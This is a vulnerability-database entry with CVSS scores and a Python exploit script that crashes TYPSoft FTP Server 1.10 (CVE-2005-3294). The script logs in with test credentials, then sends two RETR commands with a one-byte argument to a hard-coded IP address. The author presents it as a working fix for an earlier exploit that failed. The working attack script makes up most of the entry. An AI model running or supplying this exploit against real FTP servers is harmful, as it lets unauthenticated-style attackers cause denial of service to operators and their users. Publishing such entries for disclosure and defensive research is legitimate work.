TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service

2011.01.06
Credit: emgent
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python # # TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service # # CVE-2005-3294 # OSVDB 19992 # # 12/23/2010 # (C) Emanuele Gentili <emgent@backtrack-linux.org> # # Notes: # I have wrote this exploit because the code published here (1) do not work correctly. # (1) http://www.exploit-db.com/exploits/12604/ # import socket import sys user="test" pwd="test" buffer="\x41" print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.109",21)) data = s.recv(1024) print("[+] Sending user login...") s.send("USER " + user + '\r\n') data = s.recv(1024) s.send("PASS " + pwd + '\r\n') data = s.recv(1024) print("[+] Sending first exploit stage...") s.send("RETR " + buffer + '\r\n') data = s.recv(1024) print("[+] Sending second exploit stage...\n") s.send("RETR " + buffer + '\r\n') data = s.recv(1024) s.close()

References:

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
http://secunia.com/advisories/17196
http://www.securityfocus.com/bid/15104


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top